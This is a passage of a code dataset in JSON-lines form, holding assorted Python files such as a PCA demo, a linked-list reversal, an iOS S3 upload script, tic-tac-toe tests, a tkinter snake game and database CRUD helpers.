Matrix)\ncov=np.cov(scaled_x,scaled_y)\nprint (\"求协方差矩阵:\\n\",cov)\n\n# 或者散度矩阵\n# np.dot(np.transpose(data),data)\n\n# Step 3: 求协方差矩阵的特征值和特征向量\neig_val, eig_vec = np.linalg.eig(cov)\nprint (\"特征根:\\n\",eig_val)\nprint (\"特征向量:\\n\",eig_vec)\n\n# Step 4: 选择主要成分\n# 得到特征值和特征向量之后,我们可以根据特征值的大小,从大到小的选择K个特征值对应的特征向量\neig_pairs = [(np.abs(eig_val[i]), eig_vec[:,i]) for i in range(len(eig_val))]\neig_pairs.sort(reverse=True)\nprint (\"选择主要成分:\\n\",eig_pairs)\n\n# 从eig_pairs选取前k个特征向量就行。这里,我们只有两个特征向量,选一个最大的\nfeature=eig_pairs[0][1]\nprint (\"最大的:\\n\",feature)\n\n# Step 5: 转化得到降维的数据\n# 
主要将原来的数据乘以经过筛选的特征向量组成的特征矩阵之后,就可以得到新的数据了\nnew_data_reduced=np.transpose(np.dot(feature,np.transpose(data)))\nprint (\"转化得到降维的数据:\\n\",new_data_reduced)\n\n\n\n","sub_path":"tensorflow/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328227803","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\ndef createList(values):\n head = Node(values[0])\n current = head\n for i in range(1, len(values)):\n current.next = Node(values[i])\n current = current.next\n\n return head\n\ndef reverseLinkedList(seq):\n if seq is None or seq.next is None:\n return seq\n\n new_head = reverseLinkedList(seq.next)\n seq.next.next = seq\n seq.next = None\n\n return new_head\n\ndef printList(seq):\n if seq is None:\n print('Empty Linked List.\\n')\n\n while seq:\n print(seq.val, end=' ')\n seq = seq.next\n print('\\n')\n\n\n\na = [1, 2, 3, 4]\nlinkedlist = createList(a)\nprintList(linkedlist)\nprintList(reverseLinkedList(linkedlist))\n","sub_path":"CrackCodeInterview/recursion_DP/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117984515","text":"'''\n ios-s3-dist.py\n\n Python 3 Script to assist in distributing ad-hoc and enterprise iOS builds.\n Uploads build to S3 and creates a manifest.plist file to install it with.\n\n Required information should be profiled in a 'config.json' file.\n\n Usage:\n\n ios-dist.py {filename or path to build}\n\n'''\n\n\ndef main(build_filename):\n\n import tinys3, json, os, plistlib, shutil, zipfile\n\n cnfg = json.load( open('config.json') )\n\n # ---- Get information from build's Info.plist\n\n zfile = zipfile.ZipFile(build_filename)\n\n for name in zfile.namelist():\n if name.endswith('Info.plist'):\n zfile.extract(name, 'temp')\n shutil.move('temp/'+name, 'temp/Info.plist')\n shutil.rmtree('temp/Payload')\n\n info = plistlib.load( open('temp/Info.plist', 'rb') )\n\n bundle_name = info['CFBundleName']\n bundle_identifier = info['CFBundleIdentifier']\n bundle_version = info['CFBundleVersion']\n\n\n # ---- Determine which build # this is by the number of existing builds\n\n conn = tinys3.Connection(cnfg['s3_access_key'], cnfg['s3_secret_key'])\n\n uploaded_builds = conn.list(\n 'b/'+bundle_name+'-'+bundle_version,\n cnfg['bucket_name']\n )\n\n b_num = 1\n for x in uploaded_builds:\n b_num += 1\n\n build_number = 'b{0}'.format(b_num)\n\n\n # ---- Generate filenames from extracted information\n\n # Ex: 'AppName-2.0-b5.ipa'\n bd_filename = bundle_name+'-'+bundle_version+'-'+build_number+'.ipa'\n\n # Ex: 'manifest-2.0-b5.plist'\n mn_filename = 'manifest-'+bundle_version+'-'+build_number+'.plist'\n\n\n # ---- Create manifest.plist file from template\n # {0} - URL to .ipa\n # {1} - Bundle identifier\n # {2} - Bundle version\n # {3} - Bundle name\n\n template_file = open('manifest-template', 'r')\n\n manifest_data = template_file.read().format(\n 'https://s3.amazonaws.com/'+cnfg['bucket_name']+'/b/'+bd_filename,\n bundle_identifier,\n bundle_version,\n bundle_name\n )\n template_file.close()\n\n manifest_file = open('temp/manifest.plist', 'w')\n manifest_file.write(manifest_data)\n manifest_file.close()\n\n\n # ---- Upload build and manifest to S3\n\n print('\\nUploading build...')\n\n build_file = open(build_filename, 'rb')\n r = conn.upload(bd_filename, build_file, 
cnfg['bucket_name']+'/b')\n\n if r.status_code != 200:\n print('Error: Build upload unsuccessful (Status code {0})'\\\n .format(r.status_code))\n shutil.rmtree('temp')\n return\n\n print('Uploading manifest...')\n\n manifest_file = open('temp/manifest.plist', 'rb')\n r = conn.upload(mn_filename, manifest_file, cnfg['bucket_name']+'/m')\n\n if r.status_code != 200:\n print('Error: Manifest upload unsuccessful (Status code {0})'\\\n .format(r.status_code))\n # Try to clean up\n conn.delete(bd_filename, cnfg['bucket_name']+'/b')\n shutil.rmtree('temp')\n return\n\n\n # ---- Clean up and finish\n\n shutil.rmtree('temp')\n\n print('\\nUpload successful! ({0})\\n'.format(bd_filename))\n\n aws = 'https://s3.amazonaws.com/'\n b_url = aws+cnfg['bucket_name']+'/b/'+bd_filename\n m_url = aws+cnfg['bucket_name']+'/m/'+mn_filename\n\n print('-'*32)\n print('Build : {0}'.format(b_url))\n print('Manifest : {0}'.format(m_url))\n\n itms = '\\nitms-services://?action=download-manifest&url={0}'\n print(itms.format(m_url))\n print('-'*32+'\\n')\n\n\nif __name__ == '__main__':\n\n import sys\n\n if len(sys.argv) == 2:\n build_path = sys.argv[1]\n main(build_path)\n else:\n print('\\nUsage:\\n\\tios-dist.py {filename or path to build}\\n')\n\n","sub_path":"ios-s3-dist.py","file_name":"ios-s3-dist.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290453117","text":"from __future__ import absolute_import\n\nimport sys\nfrom . import process_bar\n\n\ndef train_model(\n sess, optimizer, loss,\n X_tensor, Y_tensor,\n X_train, Y_train,\n X_valid, Y_valid,\n iterations, batch_size=-1):\n num_examples = len(X_train)\n if batch_size < 0:\n batch_size = num_examples\n num_batch = int((num_examples - 1) / batch_size) + 1\n for iter in range(iterations):\n for batch in range(num_batch):\n indexes = [i % num_examples\n for i in range(batch * batch_size,\n (batch + 1) * batch_size)]\n\n bar = process_bar.process_bar(iter, iterations)\n # train batch\n feed_train = {X_tensor: X_train[indexes],\n Y_tensor: Y_train[indexes]}\n train_loss, _ = sess.run([loss, optimizer], feed_dict=feed_train)\n\n # valid\n feed_valid = {X_tensor: X_valid,\n Y_tensor: Y_valid}\n valid_loss = sess.run(loss, feed_dict=feed_valid)\n\n train_loss_str = \"%.4f\" % train_loss\n valid_loss_str = \"%.4f\" % valid_loss\n\n bar += ' Train Loss:' + train_loss_str +\\\n ' Valid Loss:' + valid_loss_str + '\\r'\n sys.stdout.write(bar)\n sys.stdout.flush()\n sys.stdout.write('\\n')\n sys.stdout.flush()\n","sub_path":"backend/utils/simple_train.py","file_name":"simple_train.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361631952","text":"# Introduction to Python Regular Expressions\n\n# Importing Libraries\nimport re\n\npattern1 = \"abcd\"\npattern1 = \"9876 efg 98\"\n#pattern1 = \"a\"\n\nprint(\"Occurrences of any character: \",re.match(r\".+\",pattern1)) \n#. 
matches every character\n# .* 0 or more, .+ one or more\nprint(\"Occurrences of a-z: \",re.search(r\"[a-z]+\",pattern1))\nprint(\"Occurrences of ab?: \",re.search(r\"ab?\",pattern1))\n\nif re.match(r\"[a-z]+\",pattern1) != None:\n print(\"Match!\")\nelse:\n print(\"No Match!\")\n \n \n####################\n\n\nsentence=\"I was born in USA, in 1996\"\n\nre.sub(r\"\\d\",\"\",sentence)\n# 'I was born in USA, in '\n\nre.sub(r\"\\d\",\"XXXX\",sentence)\n# 'I was born in USA, in XXXXXXXXXXXXXXXX'\n\nre.sub(r\"\\d\",\"X\",sentence)\n# 'I was born in USA, in XXXX'\n\n#####################################\n\nsentence=\"ab\" # try \"a\" \"abb\" \"abbbbbb\"\nre.match(\"ab?\",sentence) #a followed by no b or one b","sub_path":"Section 4 - Regular Expression/regex1.py","file_name":"regex1.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"356064457","text":"# coding=utf8\nfrom setuptools import find_packages\nfrom setuptools import setup\nimport os\n\nversion = '0.0.1.dev0'\n\nsetup(\n name='{{cookiecutter.namespace}}.{{cookiecutter.package}}',\n version=version,\n description='{{cookiecutter.description}}',\n long_description=(\n open('README.txt').read() + '\\n\\n' +\n open(os.path.join('docs', 'HISTORY.txt')).read()\n ),\n # Get more strings from\n # http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Framework :: Plone',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='{{cookiecutter.package}}',\n author='{{cookiecutter.author}}',\n author_email='{{cookiecutter.email}}',\n url='{{cookiecutter.url}}',\n license='{{cookiecutter.license}}',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['{{cookiecutter.namespace}}'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'Products.CMFPlone',\n 'plone.api',\n 'setuptools',\n 'z3c.autoinclude',\n 'five.grok',\n 'plone.app.dexterity [grok]',\n 'plone.namedfile [blobs]',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n ]\n },\n entry_points='''\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n ''',\n)\n","sub_path":"{{cookiecutter.namespace}}.{{cookiecutter.package}}/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462467792","text":"from branch.models import Branches\nfrom restapi.connection import DBConnection\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom branch.utils import get_branches_payload\nimport uuid\n\n\nclass BranchImplementation:\n def __init__(self, requests):\n self.requests = requests\n\n # create branches\n def create_branches(self):\n payload = []\n count = 0\n try:\n branches_to_create = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n for branch in branches_to_create:\n _id = str(uuid.uuid4())\n try:\n new_branch = Branches(\n branch_id=_id,\n branch_name=branch['branch_name']\n )\n session.add(new_branch)\n session.commit()\n payload.append({\"branch_id\": _id, \"message\": \"Branch added successfully.\"})\n count += 1\n except SQLAlchemyError as e:\n print(e)\n payload.append({\"branch_id\": _id, \"message\": str(e._message).split(\": \")[1].split(\"\\\\\")[0]})\n session.rollback()\n except Exception as e:\n print(e)\n raise e\n finally:\n return payload, str(count) + \" 
branch created.\"\n\n # get branches\n def get_branches(self):\n payload = []\n count = 0\n try:\n branches_to_find = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n if len(branches_to_find):\n for branch in branches_to_find:\n query = session.query(Branches).filter(Branches.branch_id == branch)\n data = query.all()\n if data:\n payload1, message, count = get_branches_payload(data, count)\n payload.append(payload1[0])\n else:\n payload.append({\"branch_id\": branch, \"message\": \"Branch doesn't exists.\"})\n message = str(count) + \" branch fetched.\"\n else:\n query = session.query(Branches)\n data = query.all()\n payload, message, count = get_branches_payload(data, count)\n except Exception as e:\n print(e)\n raise e\n return payload, message\n\n # update branches\n def update_branches(self):\n payload = []\n count = 0\n try:\n branches_to_update = self.requests.get(\"branches\", None)\n with DBConnection() as session:\n for branch in branches_to_update:\n columns_to_update = {\n Branches.branch_name: branch[\"update_data\"][\"branch_name\"]\n }\n try:\n query = session.query(Branches).filter(Branches.branch_id == branch['branch_id']) \\\n .update(columns_to_update, synchronize_session=False)\n session.commit()\n if query:\n count += 1\n payload.append({\"branch_id\": branch['branch_id'], \"message\": \"Branch updated successfully.\"})\n else:\n payload.append({\"branch_id\": branch['branch_id'], \"message\": \"Branch doesn't exist.\"})\n\n except SQLAlchemyError as e:\n print(e)\n payload.append(\n {\"branch_id\": branch['branch_id'], \"message\": str(e._message).split(\": \")[1].split(\"\\\\\")[0]})\n session.rollback()\n except Exception as e:\n print(e)\n raise e\n return payload, str(count) + \" branch updated.\"\n\n # delete branches\n def delete_branches(self):\n payload = []\n count = 0\n try:\n branches_to_delete = self.requests.get('branches', None)\n with DBConnection() as session:\n for branch in branches_to_delete:\n query = session.query(Branches).filter(Branches.branch_id == branch) \\\n .delete(synchronize_session=False)\n if query:\n count += 1\n payload.append({\"branch_id\": branch, \"message\": \"Branch deleted successfully.\"})\n session.commit()\n else:\n payload.append({\"branch_id\": branch, \"message\": \"Branch doesn't exists.\"})\n except Exception as e:\n print(e)\n raise e\n return payload, str(count) + \" branch deleted.\"\n","sub_path":"branch/implementation/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145707945","text":"from tkinter import *\nimport time\n\n\nL = 600\nBORDER = L/40.0\ninnerL = L - 2*BORDER\nN = 40\na = innerL/N\ndifficulty = 1\ngameover= True\n\n\ndef cmp(a,b):\n\treturn\t(a > b) - (a < b)\n\n\ndef create_background(master):\n\tbgCanvas = Canvas(master, width=L, height=L,bg=\"black\")\n\tbgCanvas.pack()\n\tbgCanvas.create_rectangle(BORDER,BORDER, L-BORDER, L-BORDER,fill=\"white\")\n\tbgCanvas.create_rectangle(2*BORDER,2*BORDER, L-2*BORDER, L-2*BORDER,fill=\"black\")\n\treturn bgCanvas\n\n\ndef black_canvas(master):\n\tbgCanvas.create_rectangle(2*BORDER,2*BORDER, L-2*BORDER, L-2*BORDER,fill=\"black\")\n\n\n#Creo rettangolo con il reticolo!\nclass Rectangle():\n\tdef __init__(self,canvas, coords , color=\"white\"): \n\t#\tprint(coords)\n\t\tcoord = tuple([a*el-a/2 for el in coords])+tuple([a*el +a/2for el in coords])\n\t\tself.coord = coord\n\t\tself.color = color 
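# color used as the Tk fill when the rectangle is created on the next line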
\n\t\tself.id = canvas.create_rectangle(*coord, fill=self.color)\n\n\nclass Point:\n\tdef __init__(self,*x):\n\t#\tprint (x)\n\t\tself.x=x[0]\n\t\tself.y=x[1]\n\n\tdef coord(self):\n\t\treturn (self.x,self.y)\n\ndef equal(a,b):\n\ti=0\n\tif (len(a) == len(b)):\n\t\tfor i in range(len(a)):\n\t\t\ti+= (a[i] - b[i])\n\treturn (not bool(i))\n\nclass Snake:\n\tdef __init__(self,canvas,master):\n\t\tself.body = []\n\t\tself.canvas = canvas\n\t\tself.master = master \n\t\tinit_snake = []\n\t\tself.direction = Point(0,1)\n\t\tfor i in range(4):\n\t\t\ttemp_coord = (N//2,N//2-i )\n\t\t\tinit_snake.append(Point(*temp_coord))\n\t\tfor i in range(len(init_snake)):\n\t\t\tself.body.append([init_snake[i], Rectangle( canvas, init_snake[i].coord() ) ] )\n\t\t#unit vector for the direction of movement\n\t\t\n\tdef update_snake(self):\n\t\tself.canvas.delete(self.body[-1][1].id)\n\t\tself.body.pop()\n\t\thead = self.body[0][0]\n\t\tnew_coord = (self.direction.x+head.x,self.direction.y+head.y)\n\t\tif ( max(new_coord) > N or min(new_coord) < 0 ):\n\t\t\tprint(\"gameover\")\n\t\t\tself.master.quit()\n\t\tself.body.insert(0,[Point(*new_coord),Rectangle(self.canvas, new_coord)])\n\t\tself. master.after(100, self.update_snake )\n\n\n\tdef leftKey(self,event):\n\t\tself.direction=Point(-1,0)\n\t\tprint (\"pressed left\")\n\tdef rightKey(self,event):\n\t\tself.direction=Point(1,0)\n\t\tprint (\"pressed right\")\n\tdef upKey(self,event):\n\t\tself.direction=Point(0,-1)\n\t\tprint (\"pressed up \")\n\tdef downKey(self,event):\n\t\tself.direction=Point(0,1)\n\t\tprint (\"pressed down\")\n\n\n\nif __name__ == \"__main__\":\n\tmaster = Tk();\n\tbgCanvas = create_background(master)\n\tsnake=Snake(bgCanvas,master)\n\tmaster.bind(\"\",snake.leftKey)\n\tmaster.bind(\"\",snake.rightKey)\n\tmaster.bind(\"\",snake.upKey)\n\tmaster.bind(\"\",snake.downKey)\n\tsnake.update_snake()\n\tbgCanvas.mainloop()\n","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59107294","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef create_toy_data(func, sample_size, std):\n x = np.linspace(0, 1, sample_size)\n t = func(x) + np.random.normal(scale=std, size=x.shape)\n return x, t\n\ndef func(x):\n return np.sin(2 * np.pi * x)\n\n\nx_train, y_train = create_toy_data(func, 10, 0.25)\nx_test = np.linspace(0, 1, 100)\ny_test = func(x_test)\n\n#scatter()绘制散点图\nplt.scatter(x_train, y_train, facecolor=\"none\", edgecolors=\"b\", s=50, label=\"training data\")\nplt.plot(x_test, y_test, c=\"g\", label=\"$\\sin(2\\pi x)$\")\nplt.legend()\nplt.show()\n","sub_path":"practice/ch01_Introduction.py","file_name":"ch01_Introduction.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"348421983","text":"\"\"\"\nMigration script to add the tool_dependency table.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom sqlalchemy import (\n Boolean,\n Column,\n DateTime,\n ForeignKey,\n Integer,\n MetaData,\n Table\n)\n\nfrom galaxy.model.custom_types import TrimmedString\nfrom galaxy.model.migrate.versions.util import (\n create_table,\n drop_table\n)\n\nlog = logging.getLogger(__name__)\nnow = datetime.datetime.utcnow\nmetadata = MetaData()\n\n# New table to store information about cloned tool shed repositories.\nToolDependency_table = Table(\"tool_dependency\", metadata,\n Column(\"id\", 
Integer, primary_key=True),\n Column(\"create_time\", DateTime, default=now),\n Column(\"update_time\", DateTime, default=now, onupdate=now),\n Column(\"tool_shed_repository_id\", Integer, ForeignKey(\"tool_shed_repository.id\"), index=True, nullable=False),\n Column(\"installed_changeset_revision\", TrimmedString(255)),\n Column(\"name\", TrimmedString(255)),\n Column(\"version\", TrimmedString(40)),\n Column(\"type\", TrimmedString(40)),\n Column(\"uninstalled\", Boolean, default=False))\n\n\ndef upgrade(migrate_engine):\n print(__doc__)\n metadata.bind = migrate_engine\n metadata.reflect()\n\n create_table(ToolDependency_table)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n\n drop_table(ToolDependency_table)\n","sub_path":"lib/galaxy/model/migrate/versions/0099_add_tool_dependency_table.py","file_name":"0099_add_tool_dependency_table.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471970640","text":"\"\"\"\nThis file demonstrates two different styles of tests (one doctest and one\nunittest). These will both pass when you run \"manage.py test\".\n\nReplace these with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\n\nfrom models import Player, Game\n\nclass TicTacToeTest(TestCase):\n def __playGame(self):\n player1 = Player(name=\"player1\")\n player2 = Player(name=\"player2\")\n game = Game(player1=player1, player2=player2)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n game.nextTurn(Game.O)\n game.nextTurn(Game.X)\n return game\n\n def __translateBoard(self, board):\n transBoard = []\n for piece in board:\n if piece == 'O':\n transBoard.append(Game.O)\n elif piece == 'X':\n transBoard.append(Game.X)\n else:\n transBoard.append(Game.EMPTY)\n\n return transBoard\n\n def __setupGame(self, startingBoard, turns):\n startingBoard = self.__translateBoard(startingBoard)\n player1 = Player(name=\"player1\")\n player2 = Player(name=\"player2\")\n game = Game(player1=player1, player2=player2)\n game.board = startingBoard\n game.turn = turns\n return game\n\n def test_3GamesToDraw(self):\n \"\"\"\n Simply play three games with computer X and O moves, and make\n sure nobody wins.\n \"\"\"\n game1 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game1.board), [])\n self.assertFalse(game1.checkWinner(game1.X))\n self.assertFalse(game1.checkWinner(game1.O))\n self.assertEqual(sum(game1.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n game2 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game2.board), [])\n self.assertFalse(game2.checkWinner(game2.X))\n self.assertFalse(game2.checkWinner(game2.O))\n self.assertEqual(sum(game2.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n game3 = self.__playGame()\n self.assertEqual(filter(lambda x: x==0, game3.board), [])\n self.assertFalse(game3.checkWinner(game3.X))\n self.assertFalse(game3.checkWinner(game3.O))\n self.assertEqual(sum(game3.board), 5*Game.X + 4*Game.O,\n \"Not all spaces are filled\")\n\n\n def test_fillCornerAsFirstMove(self):\n \"\"\"\n Following the logic of the game, the first move should be a corner\n move.\n \"\"\"\n turn = 0\n startingBoard = ['_', '_', '_',\n '_', '_', '_',\n '_', '_', '_',]\n\n game = self.__setupGame(startingBoard, turn)\n game.nextTurn(Game.X)\n\n # Just 
make sure there is only one X in one of the random corners\n self.assertEqual(sum(game.board[i] for i in Game.CORNERS), Game.X)\n\n\n def test_fillCenterAsSecondMove(self):\n \"\"\"\n Following the logic of the game, if the opponent has made their\n first move in a corner, then the second move should be in the center.\n \"\"\"\n turn = 1\n startingBoard = ['X', '_', '_',\n '_', '_', '_',\n '_', '_', '_',]\n\n expected = self.__translateBoard(['X', '_', '_',\n '_', 'O', '_',\n '_', '_', '_'])\n\n game = self.__setupGame(startingBoard, turn)\n game.nextTurn(Game.O)\n self.assertEqual(game.board, expected)\n\n\n def test_winBeforeBlock(self):\n \"\"\"\n The computer move should win the game before blocking. Also,\n the nextTurn() method should return True, since this move produced\n a winner, and the checkWin() method should return true for X, but\n false for O.\n\n Starting board:\n O O _\n X X _\n _ _ _\n\n It's the X player's turn. It should win the game as such:\n O O _\n X X X\n _ _ _\n\n \"\"\"\n startingBoard = ['O', 'O', '_',\n 'X', 'X', '_',\n '_', '_', '_']\n\n expected = self.__translateBoard(['O', 'O', '_',\n 'X', 'X', 'X',\n '_', '_', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n # make sure the \"AI\" wins\n win = game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n self.assertTrue(win)\n self.assertTrue(game.checkWinner(game.X))\n self.assertFalse(game.checkWinner(game.O))\n\n def test_blockWin(self):\n \"\"\"\n Block a potential win before a fork. Starting board:\n O _ X\n _ X _\n O _ _\n\n The computer should block the potential win by putting an X\n between the two O's. There is a potential fork by placing an X\n in the empty spot to the right of the X, but that would mean the\n O's could win.\n \"\"\"\n startingBoard = ['O', '_', 'X',\n '_', 'X', '_',\n 'O', '_', '_']\n\n expected = self.__translateBoard(['O', '_', 'X',\n 'X', 'X', '_',\n 'O', '_', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n # make a move and make sure the AI blocked instead forked\n game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n\n\n def test_forkBeforePlayingCenter(self):\n \"\"\"\n In this test, the center is open, but there is an opportunity to\n fork the board (i.e., give the AI two chances to win the game)\n \"\"\"\n startingBoard = ['X', 'O', '_',\n '_', '_', 'O',\n '_', 'X', '_']\n\n expected = self.__translateBoard(['X', 'O', '',\n '_', '_', 'O',\n 'X', 'X', '_'])\n\n # Setup a fake game\n game = self.__setupGame(startingBoard, 4)\n\n game.nextTurn(Game.X)\n self.assertEqual(game.board, expected)\n\n\n","sub_path":"mm_tictactoe/tictactoe/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233119834","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statistics import median\n\n# democrat = 0, republican = 1\n\ndataset = pd.read_csv('Parliment-1984.csv')\nX = dataset.iloc[:, 1:].values\ny = dataset.iloc[:, 0].values\n\nfor i in range(0,434):\n if y[i] == 'democrat':\n y[i] = 0\n elif y[i] == 'republican':\n y[i] = 1\ny = y.astype(int)\n\nfor a in range(0, 434):\n for b in range(0,16):\n if ('y' in X[a][b]):\n X[a][b] = 1\n elif ('n' in X[a][b]):\n X[a][b] = 0\n \nmedians = []\nfor x in range(0, 16):\n acceptable = []\n for z in range(0,434):\n if((X[z][x] == 1) or (X[z][x] == 0)):\n acceptable.append(X[z][x])\n med = median(acceptable)\n 
medians.append(int(med))\n \nfor c in range(0, 434):\n for d in range(0,16):\n if ((X[c][d] != 1) and (X[c][d] != 0)):\n X[c][d] = medians[d]\n \nX = X.astype(int)\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2)\n\nfrom sklearn.svm import SVC\nclassifier = SVC(kernel = 'rbf')\nclassifier.fit(X_train, y_train)\n\ny_pred = classifier.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\nfrom sklearn.metrics import f1_score\nf1_score(y_test, y_pred, average='binary') \n# F1 score is approximately 0.95","sub_path":"classifier-kernel_svm.py","file_name":"classifier-kernel_svm.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646153971","text":"# Copyright (c) 2017, Riverbank Computing Limited\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\nimport argparse\n\nfrom . 
import MessageHandler, PYQTDEPLOY_RELEASE, Sysroot, UserException\n\n\ndef main():\n \"\"\" The entry point for the setuptools generated pyqtdeploy-sysroot\n wrapper.\n \"\"\"\n\n # Parse the command line.\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--no-clean',\n help=\"do not remove the temporary build directory to make debugging package plugins easier\",\n action='store_true')\n parser.add_argument('--options',\n help=\"show the options available for the packages\",\n action='store_true')\n parser.add_argument('--package', help=\"the package name to build\",\n action='append')\n parser.add_argument('--plugin-path',\n help=\"the directories searched for package plugins\",\n metavar=\"PATH\")\n parser.add_argument('--apple-sdk',\n help=\"the SDK to use for Apple targets\", metavar=\"SDK\")\n parser.add_argument('--source-dir',\n help=\"the default directory containing the source archives\",\n metavar=\"DIR\")\n parser.add_argument('--sysroot', help=\"the system image root directory\",\n metavar=\"DIR\")\n parser.add_argument('--target', help=\"the target platform\")\n parser.add_argument('--quiet', help=\"disable progress messages\",\n action='store_true')\n parser.add_argument('--verbose', help=\"enable verbose progress messages\",\n action='store_true')\n parser.add_argument('-V', '--version', action='version',\n version=PYQTDEPLOY_RELEASE)\n parser.add_argument('json',\n help=\"JSON specification of the system image root directory\")\n\n args = parser.parse_args()\n\n # Perform the required action.\n message_handler = MessageHandler(args.quiet, args.verbose)\n\n try:\n sysroot = Sysroot(args.sysroot, args.json, args.plugin_path,\n args.source_dir, args.apple_sdk, args.target, message_handler)\n\n if args.options:\n sysroot.show_options(args.package)\n else:\n sysroot.build_packages(args.package, args.no_clean)\n except UserException as e:\n message_handler.exception(e)\n return 1\n\n return 0\n","sub_path":"pyqtdeploy/pyqtdeploysysroot_main.py","file_name":"pyqtdeploysysroot_main.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137340993","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom twisted.enterprise import adbapi\nimport pymysql\n\nclass CaifuPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass TwiPipeline(object):\n def __init__(self,dbpool,insert_sql):\n self.dbpool = dbpool\n self.insert_sql = insert_sql\n @classmethod\n def from_settings(cls, settings):\n dbparms = dict(\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DBNAME\"],\n user=settings[\"MYSQL_USER\"],\n passwd=settings[\"MYSQL_PASSWORD\"],\n\n 